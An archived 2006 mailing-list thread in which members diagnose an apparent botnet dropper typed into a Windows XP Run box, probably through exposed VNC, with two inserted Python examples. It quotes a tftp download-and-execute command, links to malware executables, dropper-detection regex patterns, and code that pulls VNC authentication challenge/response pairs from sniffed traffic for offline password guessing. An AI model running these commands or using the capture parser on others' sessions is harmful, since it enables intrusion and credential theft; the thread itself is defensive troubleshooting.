PICList
Thread
'[EE]: WINXP Malware Attacks? CAUTION - POSSIBLE BAD LINKS LISTED'
2006\10\05@144300
by
Carey Fisher - NCS
Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
http://homepage.my-place.us/system.exe
Well, I immediately disabled the network connection and I don't think this program was executed.
Then I scrolled through the Run window and found the following 3 lines:
cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
http://kruma.us/vn.exe
%SYSTEMROOT%\SYSTEM32\CMD.EXE
This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?
Thanks,
Carey
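The three leftover entries Carey found in the Run dialog's drop-down come from the RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), where Explorer stores each command as a string value named a, b, c... with a trailing literal "\1", and an MRUList value giving most-recent-first order. As an added example that is not part of the thread, the Python below reads that key (live on Windows, or from a constructed dump that mirrors the lines quoted above) and flags the patterns a bot dropper leaves behind: a tftp -i ... GET fetch, a bare URL to an executable, or a cmd /c line chaining commands with &. The pattern list and the sample dump are assumptions of mine, not anything the thread supplies.

```python
import re
from typing import Dict, List, Tuple

RUNMRU_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Heuristics for what a bot dropper types into Start/Run. Assumed list; tune it.
SUSPICIOUS = [
    (re.compile(r"\btftp\b.*\s-i\b.*\bget\b", re.I), "tftp -i GET download (classic bot dropper)"),
    (re.compile(r"https?://\S+\.(exe|scr|bat|pif|vbs)\b", re.I), "URL pointing at an executable"),
    (re.compile(r"\bcmd(\.exe)?\s+/c\b.*&", re.I), "cmd /c with chained commands"),
]

# Constructed dump of a RunMRU key, mirroring the three lines quoted in the thread.
# Real values end in a literal backslash-1; MRUList lists value names most-recent first.
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit\\1",
    "c": "http://kruma.us/vn.exe\\1",
    "d": "%SYSTEMROOT%\\SYSTEM32\\CMD.EXE\\1",
}


def parse_runmru(values: Dict[str, str]) -> List[str]:
    """Return the Run history in MRUList order (most recent first), trailing \\1 removed."""
    history = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue  # MRUList can still name a value that was deleted
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def suspicious_entries(values: Dict[str, str]) -> List[Tuple[str, List[str]]]:
    """Pair each flagged Run entry with the reasons it tripped, most recent first."""
    flagged = []
    for cmd in parse_runmru(values):
        reasons = [why for rx, why in SUSPICIOUS if rx.search(cmd)]
        if reasons:
            flagged.append((cmd, reasons))
    return flagged


def read_runmru_from_registry() -> Dict[str, str]:
    """Live read of HKCU RunMRU; Windows only (winreg is in the stdlib there)."""
    import winreg  # imported here so the module still loads on other platforms
    values: Dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_PATH) as key:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:
                break  # no more values
            values[name] = str(data)
            i += 1
    return values


if __name__ == "__main__":
    try:
        values = read_runmru_from_registry()
    except ImportError:
        values = SAMPLE_RUNMRU  # not on Windows: run over the constructed dump
    for cmd, reasons in suspicious_entries(values):
        print(f"SUSPICIOUS: {cmd!r}  <- {', '.join(reasons)}")
```

Note that a plain CMD.EXE path is not flagged on its own: the signal is the download-and-run shape of the line, not the interpreter. On a real box, compare the timestamps of these entries with the logon and VNC session times to tell a typed command from an automated one.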
2006\10\05@150158
by
Orin Eman
On 10/5/06, Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
>
> Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?
Some variant of:
http://www.sophos.com/security/analyses/trojtofgerb.html ?
Try a free trial of PCdefense... http://www.laplink.com/pcdefense/
Run all the scans as you appear to be infected with something.
Orin.
2006\10\05@151500
by
Peter Bindels
Sounds like:
http://www.avira.com/en/threats/section/fulldetails/id_vir/1496/worm_rbot.aeu.79.html
BTW, tried the IRC server, it's down. Sounds like an old botnet.
I've also stumbled across (and misplaced) a website that claimed it
could come from using a web browser that supports VBS.
Regards & good luck,
Peter
On 05/10/06, Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
>
> Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?
>
> Thanks,
> Carey
2006\10\05@153458
by
James Newtons Massmind
Check your "autoruns" using autoruns from sysinternals.
http://www.sysinternals.com/Utilities/Autoruns.html This is the list, in
case you don't know, that windows activates when it starts, and is an easy
way for malware to get itself started again when you reboot. Since this
means the malware does not need to modify an existing .exe to get started,
it will NOT appear on most anti-virus scans. Adaware does a better job of
catching these automatically, but I find that getting to know the autoruns
is a better way of combating the problem.
This has more info on your bad .exe
fileinfo.prevx.com/adware/qq276a42612891-WFUD25104328/WFUDPGEMR.EXE.html
"WFUDPGEMR.EXE may use 5 or more path and file names, these are the most
common:
1 :%TEMP%\DHAYZLAUKX.EXE
2 :%WINDIR%\SYSTEM32\WFUDPGEMR1234.EXE"
Each of those may be listed in your autoruns.
Please DO keep us posted? I'm very interested to know what you find.
---
James.
2006\10\05@174705
by
Philip Pemberton
Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> h**p://h*m*p*g*.*y*p*a*e*u*/system.exe [ URL declawed by PAP ]
ClamAV says:
philpem@wolf:~/MALWARE$ clamscan system_exe
system_exe: Trojan.Mybot-1445 FOUND
----------- SCAN SUMMARY -----------
Known viruses: 71517
Engine version: 0.88.2
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.32 MB
Time: 46.696 sec (0 m 46 s)
Virusdata from Sophos is here:
http://www.sophos.com/security/analyses/w32rbotadh.html
If you don't have an antivirus installed, go find a clean machine, grab AVG
(from free.grisoft.com), burn it to CD, then install it. If AVG won't install,
get the firewall enabled and block *everything*. Go to
http://housecall.trendmicro.com/ and scan your system. Let it remove any
viruses it finds. Then install AVG.
Looks like pretty much your standard password stealing IRC botnet building
trojan/worm. If I get sufficiently bored, I'll throw it into a VMware sandbox
and pull it to bits with the old IDA freeware release and OllyDebug.
> This really surprised me since I've taken a lot of measures to secure my system
including a program that won't let new programs run without my permission.
This is why the first one didn't run. I also run antivirus, I monitor the
router/firewall with Wallwatcher, and I block all inbound ports except a
couple (Skype, FreeVNC).
I notice you're using Outlook Express (the X-Mailer header told me <grin>).
FWIW, there are tons of exploits that allow remote code execution in OE. The
old double-extension bug, buffer overflows, the list goes on. I'd switch to
Mozilla Thunderbird (it's a pretty painless switch, Tbird can import most/all
of your mail and settings from OE).
What antivirus are you using?
I guess you've got a perimeter firewall on the router. Any firewall software
on the machine itself (e.g. ZoneAlarm)?
> Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?
I wonder if someone exploited VNC... What's your VNC password like - all
lowercase and less than 8 characters maybe? And no numbers or symbols? :)
I have my network set up so that you have to SSH in (and use a public key to
authenticate yourself with the server), then you have to tunnel from the
server to the machines inside the network. There are only a few ports open on
the router - SSH, SMTP and HTTP. If I need to connect to a machine on the LAN
from the Internet, I don't add a port-forward, I use an SSH tunnel.
--
Phil.                     | (\_/) This is Bunny. Copy and paste Bunny
                          | (='.'=) into your signature to help him gain
http://www.philpem.me.uk/ | (")_(") world domination.
2006\10\05@193823
by
Carey Fisher
Thanks for the replies everyone... comments below...
Philip Pemberton wrote:
> Carey Fisher - NCS wrote:
>
>> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>>
>> h**p://h*m*p*g*.*y*p*a*e*u*/system.exe [ URL declawed by PAP ]
>>
>
> ClamAV says:
> philpem@wolf:~/MALWARE$ clamscan system_exe
> system_exe: Trojan.Mybot-1445 FOUND
> ...
>
....
> If you don't have an antivirus installed, go find a clean machine, grab AVG
> (from free.grisoft.com), burn it to CD, then install it. If AVG won't install,
> get the firewall enabled and block *everything*. Go to
> http://housecall.trendmicro.com/ and scan your system. Let it remove any
> viruses it finds. Then install AVG.
>
Yeah, I use AVG and keep it up to date. I also used McAfee Virus Scan
and nothing can find a virus on that machine.
> I notice you're using Outlook Express (the X-Mailer header told me <grin>).
> FWIW, there are tons of exploits that allow remote code execution in OE. The
> old double-extension bug, buffer overflows, the list goes on. I'd switch to
> Mozilla Thunderbird (it's a pretty painless switch, Tbird can import most/all
> of your mail and settings from OE).
>
I have Thunderbird on all but that one machine - in fact I'm using
Thunderbird now. Maybe I should switch that last machine:)
> What antivirus are you using?
> I guess you've got a perimeter firewall on the router. Any firewall software
> on the machine itself (e.g. ZoneAlarm)?
>
Just using the router for a firewall. I've scanned it from outside and
no ports are open except VNC & SKYPE. Also, I've set the DHCP on the
DSL Modem to reset every hour.
>
>> Anybody know anything about any of these apparent attacks. Any suggestions to prevent this particular exploit (START/Run)?
>>
>
> I wonder if someone exploited VNC... What's your VNC password like - all
> lowercase and less than 8 characters maybe? And no numbers or symbols? :)
>
That's what I'm wondering too... my pw is >8 char and numbers and letters.
> I have my network set up so that you have to SSH in (and use a public key to
> authenticate yourself with the server), then you have to tunnel from the
> server to the machines inside the network. There are only a few ports open on
> the router - SSH, SMTP and HTTP. If I need to connect to a machine on the LAN
> from the Internet, I don't add a port-forward, I use an SSH tunnel.
>
I also run StartUpMonitor so any new programs can't get stuck in as
autoruns.
I'll run Ethereal a while and see what I catch. Maybe set up a
different machine as a "honeypot".
Carey
2006\10\05@195417
by
Gerhard Fiedler
Carey Fisher wrote:
> Just using the router for a firewall.
One reason for using a local firewall is to have better control over the
outgoing connections from your machine.
> I've scanned it from outside and no ports are open except VNC & SKYPE.
What ports do you open for Skype? I use it, and never opened any ports for
it.
> Also, I've set the DHCP on the DSL Modem to reset every hour.
Which doesn't help if you have a trojan on your machine...
I'm not sure whether this is too obvious, but do you know all processes
that run on your machine?
Gerhard
2006\10\05@204725
by
Carey Fisher
Gerhard Fiedler wrote:
> Carey Fisher wrote:
>
>> Just using the router for a firewall.
>>
>
> One reason for using a local firewall is to have better control over the
> outgoing connections from your machine.
>
>
I do have the XP firewall turned on but no third party ones. And
Wallwatcher has never reported a blocked outbound connection...
hmmmm...blocked....
what about the ones that are not blocked...
>> I've scanned it from outside and no ports are open except VNC & SKYPE.
>>
>
> What ports do you open for Skype? I use it, and never opened any ports for
> it.
>
>
>> Also, I've set the DHCP on the DSL Modem to reset every hour.
>>
>
> Which doesn't help if you have a trojan on your machine...
>
> I'm not sure whether this is too obvious, but do you know all processes
> that run on your machine?
>
I have looked at the process list and looked up ones I didn't recognize
- nothing funny there.
Oh - another clue - never happens when I'm logged out of XP and never
happens when I disable the network connection on the machine. I also
don't normally run with Admin privileges.
> Gerhard
>
Carey
2006\10\06@023355
by
Ruben Jönsson
> Gerhard Fiedler wrote:
> > Carey Fisher wrote:
> >
> >> Just using the router for a firewall.
> >>
> >
> > One reason for using a local firewall is to have better control over the
> > outgoing connections from your machine.
> >
> >
> I do have the XP firewall turned on but no third party ones. And
> Wallwatcher has never reported a blocked outbound connection...
> hmmmm...blocked....
> what about the ones that are not blocked...
The XP firewall does not block outgoing traffic. The new Vista and Windows
Server firewall will.
/Ruben
==============================
Ruben Jönsson
AB Liros Electronic
Box 9124, 200 39 Malmö, Sweden
TEL INT +46 40142078
FAX INT +46 40947388
==============================
2006\10\06@073317
by
Gerhard Fiedler
Carey Fisher wrote:
> Oh - another clue - never happens when I'm logged out of XP [...]
AFAIK it's not possible to insert into the keyboard buffer (which seems to
be what is happening) when you're not logged in or while the session is
locked. Which is good (in this case) and can be a pain (when trying to
automate a GUI application with something like AutoIt3 and wanting it to
work while the session is locked).
> [...] and never happens when I disable the network connection on the
> machine.
Seems you do have an infection. Strange though that no virus scanner
catches it. Maybe you try to make a boot CD (look for BartPE for example)
with a few scanners and run them from the boot CD.
Gerhard
2006\10\06@091019
by
Herbert Graf
On Thu, 2006-10-05 at 14:42 -0400, Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission. This is why the first one didn't run. I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
I'm no expert, but a google search on wfudpgemr.exe resulted in the
following hit:
http://virusinfo.prevx.com/pxparall.asp?PX5=276a54da005930a684a00178b3ce3300aa757be4&psection=desc
> Anybody know anything about any of these apparent attacks.
Not really, haven't been paying much attention.
> Any suggestions to prevent this particular exploit (START/Run)?
Perhaps a little extreme for most, but: run a different OS. MacOS isn't
bad, I run Linux. TTYL
2006\10\06@122141
by
Orin Eman
On 10/6/06, Gerhard Fiedler wrote:
> Carey Fisher wrote:
>
> > Oh - another clue - never happens when I'm logged out of XP [...]
>
> AFAIK it's not possible to insert into the keyboard buffer (which seems to
> be what is happening) when you're not logged in or while the session is
> locked. Which is good (in this case) and can be a pain (when trying to
> automate a GUI application with something like AutoIt3 and wanting it to
> work while the session is locked).
It is possible. Quite easy by inserting an upper filter driver above
the keyboard driver. It's done by the remote control applications. It
does need admin rights to install and a reboot. The really bad thing
is if you remove the driver but don't fix the registry, you lose your
keyboard!
Orin.
2006\10\06@132157
by
James Newton
> Oh - another clue - never happens when I'm logged out of XP
> and never happens when I disable the network connection on
> the machine. I also don't normally run with Admin privileges.
The malware may be starting in your logon script.
http://www.windowsnetworking.com/articles_tutorials/wxpplogs.html
Again, autorun from sysinternals (a free utility) will list all possible
sources for the startup of any program. Finding and removing the entry for
the malware will stop it from gaining control of the system.
http://www.sysinternals.com/Utilities/Autoruns.html
Note that there are many strange looking things that DO need to start, and
you must be careful. Autoruns allows you to filter OUT Microsoft signed
programs, and it has a nice feature to google for the program name which
will generally allow you to see what it does and why.
Be sure to run it after booting in safe mode so that the program will not be
able to re-install itself in the run list after you remove it.
---
James.
2006\10\06@150040
by
Paul Hutchinson
2006\10\07@084442
by
Howard Winter
Carey,
On Thu, 05 Oct 2006 19:38:24 -0400, Carey Fisher wrote:
>...
> Just using the router for a firewall. I've scanned it from outside and
> no ports are open except VNC & SKYPE.
The last time I tried to find out which port(s) Skype uses, I was unable to (they said something like "anything over 1024", which isn't very good for
filtering!). Which ones do you use/allow through for Skype?
Cheers,
Howard Winter
St.Albans, England
2006\10\07@090552
by
peter green
>
> The last time I tried to find out which port(s) Skype uses, I was
> unable to (they said something like "anything over 1024", which
> isn't very good for
> filtering!). Which ones do you use/allow through for Skype?
I don't use Skype because I disapprove of their policy of raping other
users' bandwidth to provide service to those on firewalled networks.
If you must use it I strongly advise against forwarding any ports for it
(even if you find out what listen port it uses) as this may allow your copy
of Skype to become a supernode and suck up insane bandwidth (saturating a
100 megabit connection is NOT unheard of).
2006\10\07@092402
by
Gerhard Fiedler
peter green wrote:
> Howard Winter wrote:
>> The last time I tried to find out which port(s) Skype uses, I was unable
>> to (they said something like "anything over 1024", which isn't very
>> good for filtering!). Which ones do you use/allow through for Skype?
FWIW, I'm behind an SMC firewall and I don't forward anything for Skype. It
seems to work with outbound connections only.
> i don't use skype because i disaprove of their policies of raping other
> users bandwidth to provide service to those on firewalled networks.
How's that? Do you have more detailed information?
Gerhard
2006\10\09@011824
by
Frank Niu
How is this matter going? Actually I encountered exactly the same virus/worm
and don't know how to get rid of it.
Checked with Sysinternals autoruns.exe, found nothing suspicious. I'm pretty
sure it has something to do with VNC: this issue occurs on my 3 machines
with VNC server installed every few minutes, intermittently. After I closed
VNC server, it seems it won't occur for now.
Any final solution for this?
2006\10\09@064617
by
Gerhard Fiedler
Frank Niu wrote:
> I'm pretty sure it has something to do with VNC: This issue occurs with
> my 3 machines with VNC server installed every a few minutes
> intermittently. After I closed VNC server, seems it won't occur for now.
>
> Any final solution for this?
Going with the standard comment "use Linux": use NetMeeting :)
Wouldn't expose it on the Internet, but on a LAN behind a firewall I don't
see a problem.
Gerhard
2006\10\09@093647
by
Carey Fisher
Frank Niu wrote:
> How is this matter going? Actually I encountered exact the same virus/worm
> and don't know how to get rid of it.
>
>
I've scanned with multiple virus scanners including AVG and Norton.
I've run Adaware and Spybot and I've
found nothing at all.
Also, still no intrusions with any one or more of the following true:
VNC stopped
network disconnected
logged out
> Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty
> sure it has something to do with VNC: This issue occurs with my 3 machines
> with VNC server installed every a few minutes intermittently. After I closed
> VNC server, seems it won't occur for now.
>
> Any final solution for this?
>
I'm convinced there is no virus in the machine and it seems someone is
trying to (manually?) type a command in the Start/Run box as if they are
sitting in front of the computer.
So, that sorta leaves VNC except I have it running as a Service which
means if someone was using VNC they could still use it when all users
are logged out except they can't login cause I have a strong password.
I have 3 machines with VNC but only one is forwarded to from the
router. That's the one that's being compromised.
Now I'm investigating my Wi-Fi nodes.
Carey
2006\10\09@123414
by
Orin Eman
On 10/9/06, Carey Fisher wrote:
>
> Frank Niu wrote:
> > How is this matter going? Actually I encountered exact the same virus/worm
> > and don't know how to get rid of it.
> >
> >
> I've scanned with multiple virus scanners including AVG and Norton.
> I've run Adaware and Spybot and I've
> found nothing at all.
>
> Also, still no intrusions with any one or more of the following true:
> VNC stopped
> network disconnected
> logged out
>
> > Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty
> > sure it has something to do with VNC: This issue occurs with my 3 machines
> > with VNC server installed every a few minutes intermittently. After I closed
> > VNC server, seems it won't occur for now.
> >
> > Any final solution for this?
> >
> I'm convinced there is no virus in the machine and it seems someone is
> trying to (manually?) type a command in the Start/Run box as if they are
> sitting in front of the computer.
>
> So, that sorta leaves VNC except I have it running as a Service which
> means if someone was using VNC they could still use it when all users
> are logged out except they can't login cause I have a strong password.
> I have 3 machines with VNC but only one is forwarded to from the
> router. That's the one that's being compromised.
>
> Now I'm investigating my Wi-Fi nodes.
VNC's password encryption _wasn't_ last time I looked. If you can
sniff the network, it doesn't matter how strong the password is.
As for WiFi, what encryption are you using? WEP isn't secure. I've
deliberately sniffed my own network with kismet and run aircrack. It
took a couple of GB of data, but it found the key.
Orin.
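Orin's sniffing point, made concrete: classic RFB "VNC authentication" is a DES challenge/response in which the password itself (truncated or padded to 8 bytes, bits of each byte reversed) is the DES key, so whoever captures the 16-byte challenge and 16-byte response on port 5900 can test password guesses offline and never has to talk to the server. As an added example that is not part of the thread, the Python below parses the start of a reassembled RFB session (the 3.3 layout and the 3.7/3.8 layout) to pull out that pair, and shows the password-to-key transform. The sample streams are constructed; the response bytes are a placeholder rather than a real DES output, and no DES implementation is included (hand the extracted pair plus vnc_des_key() of each candidate to any DES-ECB routine to finish the check).

```python
import struct
from dataclasses import dataclass
from typing import Optional

SEC_NONE, SEC_VNC_AUTH = 1, 2  # RFB security types; 2 is the DES challenge/response


@dataclass
class RfbAuth:
    server_version: str
    client_version: str
    security_type: int
    challenge: Optional[bytes] = None   # 16 bytes sent by the server
    response: Optional[bytes] = None    # 16 bytes sent back by the client
    result: Optional[int] = None        # SecurityResult: 0 = OK, 1 = failed


def parse_rfb_handshake(server: bytes, client: bytes) -> RfbAuth:
    """Extract the authentication exchange from the two directions of a
    reassembled RFB TCP stream (e.g. Wireshark 'Follow TCP Stream' on :5900)."""
    sv = server[:12].decode("ascii", "replace")
    cv = client[:12].decode("ascii", "replace")
    if not (sv.startswith("RFB ") and cv.startswith("RFB ")):
        raise ValueError("not an RFB stream")
    si = ci = 12
    minor = int(cv[8:11])  # the client's reply fixes the version actually used
    if minor <= 3:
        # RFB 3.3: the server alone chooses one security type, sent as a u32
        (sectype,) = struct.unpack(">I", server[si:si + 4]); si += 4
    else:
        # RFB 3.7/3.8: server lists u8 types (count first), client picks one u8
        count = server[si]; si += 1
        offered = server[si:si + count]; si += count
        sectype = client[ci]; ci += 1
        if sectype not in offered:
            raise ValueError(f"client chose type {sectype}, not in offered {list(offered)}")
    auth = RfbAuth(sv.strip(), cv.strip(), sectype)
    if sectype == SEC_VNC_AUTH:
        auth.challenge = server[si:si + 16]; si += 16
        auth.response = client[ci:ci + 16]; ci += 16
        if len(auth.challenge) != 16 or len(auth.response) != 16:
            raise ValueError("stream truncated before challenge/response completed")
        if len(server) >= si + 4:  # SecurityResult follows the response
            (auth.result,) = struct.unpack(">I", server[si:si + 4])
    return auth


def vnc_des_key(password: str) -> bytes:
    """RFB pads/truncates the password to 8 bytes and uses it as the DES key with
    the bits of every byte reversed (an old AT&T VNC quirk). The password IS the key,
    which is why a captured pair can be brute-forced offline."""
    raw = password.encode("latin-1", "replace")[:8].ljust(8, b"\0")
    return bytes(int(f"{b:08b}"[::-1], 2) for b in raw)


# Constructed sample capture of an RFB 3.3 session. The response is a placeholder
# pattern, not a real DES output, so the parser can be exercised without a DES library.
CHALLENGE = bytes(range(16))
RESPONSE = b"\xaa" * 16
SERVER_33 = b"RFB 003.003\n" + struct.pack(">I", SEC_VNC_AUTH) + CHALLENGE + struct.pack(">I", 0)
CLIENT_33 = b"RFB 003.003\n" + RESPONSE

# Same exchange under RFB 3.8: server offers [None, VNC auth], client picks VNC auth, login fails.
SERVER_38 = b"RFB 003.008\n" + bytes([2, SEC_NONE, SEC_VNC_AUTH]) + CHALLENGE + struct.pack(">I", 1)
CLIENT_38 = b"RFB 003.008\n" + bytes([SEC_VNC_AUTH]) + RESPONSE

if __name__ == "__main__":
    for s, c in ((SERVER_33, CLIENT_33), (SERVER_38, CLIENT_38)):
        a = parse_rfb_handshake(s, c)
        print(a.client_version, "type", a.security_type, "challenge", a.challenge.hex(),
              "response", a.response.hex(), "result", a.result)
    print("DES key for 'secret':", vnc_des_key("secret").hex())
```

Two consequences follow from the key transform: only the first 8 characters of the password matter at all, and the search space for an offline guess is whatever character set those 8 bytes were drawn from, which is why tunnelling the whole session (SSH or a VPN, as suggested later in the thread) is the fix rather than a longer password.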
2006\10\09@171709
by
Dave Wheeler
A google for VNC vulnerability leads to a mass of undocumented features :-)
Most have been fixed in the latest versions
Dave
2006\10\09@183733
by
James Newtons Massmind
> I'm convinced there is no virus in the machine and it seems
> someone is trying to (manually?) type a command in the
> Start/Run box as if they are sitting in front of the computer.
>
> So, that sorta leaves VNC except I have it running as a
> Service which means if someone was using VNC they could still
> use it when all users are logged out except they can't login
> cause I have a strong password.
> I have 3 machines with VNC but only one is forwarded to from
> the router. That's the one that's being compromised.
>
> Now I'm investigating my Wi-Fi nodes.
>
> Carey
Wow! Sounds like VNC is being compromised... I would get Ethereal (sniffing
the glue that holds the internet together) fired up and set to look for that
string and log any packets containing it.
If it is VNC, I'm sorry to hear it. The boss's daughter just asked me to start
looking for a VPN solution and VNC was on my list to check.
---
James.
2006\10\09@192655
by
Gerhard Fiedler
James Newtons Massmind wrote:
> If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to start
> looking for a VPN solution and VNC was on my list to check.
Does VNC include a VPN? I thought it was a remote control server/client
application.
I'm using an SMC Barricade router that has a VPN server built-in. That's
quite convenient and really simple to set up.
BTW, running VNC over a VPN could be a workaround for Carey. This way the
VNC traffic is not exposed directly to the Internet (or the wireless LAN).
Gerhard
2006\10\09@194459
by
Bob Blick
>
> If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to
> start
> looking for a VPN solution and VNC was on my list to check.
Hi James,
VNC is not VPN - but if you are using it on the internet, you should use
it inside a VPN or SSH.
Another remote client/server you might look at is NX (No Machine). It uses
less bandwidth but is much more processor intensive than VNC. And is not
open source(although there are free beer versions). It uses SSH by
default, I believe. (I only use these things locally behind a firewall, so
I don't pay much attention to that part of it).
Cheerful regards,
Bob
2006\10\09@235059
by
Rich Mulvey
James Newtons Massmind wrote:
>> I'm convinced there is no virus in the machine and it seems
>> someone is trying to (manually?) type a command in the
>> Start/Run box as if they are sitting in front of the computer.
>>
>> So, that sorta leaves VNC except I have it running as a
>> Service which means if someone was using VNC they could still
>> use it when all users are logged out except they can't login
>> cause I have a strong password.
>> I have 3 machines with VNC but only one is forwarded to from
>> the router. That's the one that's being compromised.
>>
>> Now I'm investigating my Wi-Fi nodes.
>>
>> Carey
>>
>
>
> Wow! Sounds like VNC is being compromised... I would get ethereal (sniffing
> the glue that holds the internet together) fired up and set to look for that
> string and log any packets containing it.
>
> If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to start
> looking for a VPN solution and VNC was on my list to check.
>
>
>
One thing to be aware of is that "VNC" is really just a reference to
a protocol, and not a particular application. There are literally
dozens of different implementations of VNC - some commercial, some open
source, etc. Some have holes big enough to drive a truck through, while
others are reasonably secure.
That being said, there's no way in heck I'd ever use any VNC
application that wasn't being tunneled over a VPN or SSH.
- Rich
2006\10\10@004747
by
Orin Eman
On 10/9/06, Rich Mulvey wrote:
> One thing to be aware of is that "VNC" is really just a reference to
> a protocol, and not a particular application. There are literally
> dozens of different implementations of VNC - some commercial, some open
> source, etc. Some have holes big enough to drive a truck through, while
> others are reasonably secure.
>
> That being said, there's no way in heck I'd ever use any VNC
> application that wasn't being tunneled over a VPN or SSH.
That's safest...
If you want a (rather old now) SSL enabled VNC, it's available from:
http://www.laplink.com/products/vnc/overview.asp
Orin.
2006\10\10@143658
by
James Newtons Massmind
> Hi James,
>
> VNC is not VPN - but if you are using it on the internet, you
> should use it inside a VPN or SSH.
I was suffering from confabulation. ;o)
> Another remote client/server you might look at is NX (No
> Machine). It uses less bandwidth but is much more processor
> intensive than VNC. And is not open source(although there are
> free beer versions). It uses SSH by default, I believe. (I
> only use these things locally behind a firewall, so I don't
> pay much attention to that part of it).
Thanks, I'll check it out.
---
James.
2006\10\10@192508
by
Carey Fisher
Orin Eman wrote:
> On 10/9/06, Rich Mulvey wrote:
>
>> One thing to be aware of is that "VNC" is really just a reference to
>> a protocol, and not a particular application. There are literally
>> dozens of different implementations of VNC - some commercial, some open
>> source, etc. Some have holes big enough to drive a truck through, while
>> others are reasonably secure.
>>
>> That being said, there's no way in heck I'd ever use any VNC
>> application that wasn't being tunneled over a VPN or SSH.
>>
>
> That's safest...
>
> If you want a (rather old now) SSL enabled VNC, it's available from:
>
>
http://www.laplink.com/products/vnc/overview.asp
>
> Orin.
>
I understand what you guys are saying and I do have a VPN equipped
router at this location.
But I need (want?) to access the machine in question from nearly
anywhere and any machine
so I can't count on being able to setup a tunnel from just anywhere.
Maybe I should just run VNC over a VPN connection between here and the
one other place
I spend a lot of time. I can install a VPN router there.
BTW, I'm running RealVNC and my password is ............ at IP address
192.168.99.257
;)
Carey
2006\10\10@215014
by
Jake Anderson
Carey Fisher wrote:
> Orin Eman wrote:
>
>> On 10/9/06, Rich Mulvey wrote:
>>
>>
>>> One thing to be aware of is that "VNC" is really just a reference to
>>> a protocol, and not a particular application. There are literally
>>> dozens of different implementations of VNC - some commercial, some open
>>> source, etc. Some have holes big enough to drive a truck through, while
>>> others are reasonably secure.
>>>
>>> That being said, there's no way in heck I'd ever use any VNC
>>> application that wasn't being tunneled over a VPN or SSH.
>>>
>>>
>> That's safest...
>>
>> If you want a (rather old now) SSL enabled VNC, it's available from:
>>
>> www.laplink.com/products/vnc/overview.asp
>>
>> Orin.
>>
>>
>
> I understand what you guys are saying and I do have a VPN equipped
> router at this location.
> But I need (want?) to access the machine in question from nearly
> anywhere and any machine
> so I can't count on being able to setup a tunnel from just anywhere.
> Maybe I should just run VNC over a VPN connection between here and the
> one other place
> I spend a lot of time. I can install a VPN router there.
> BTW, I'm running RealVNC and my password is ............ at IP address
> 192.168.99.257
> ;)
> Carey
>
>
Perhaps enable web management of your router (as in from outside) with a
good password.
Then allow port forwards from the machine you're on when you want to use
it, rather than from the whole net the whole time.
Otherwise get a "real" firewall (Linux style) and put a port knock thing
on (doorman) that will allow you in.
